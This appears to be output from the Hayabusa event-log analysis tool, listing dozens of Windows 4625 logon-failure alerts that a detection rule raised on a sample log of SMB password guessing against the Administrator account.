+2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: 
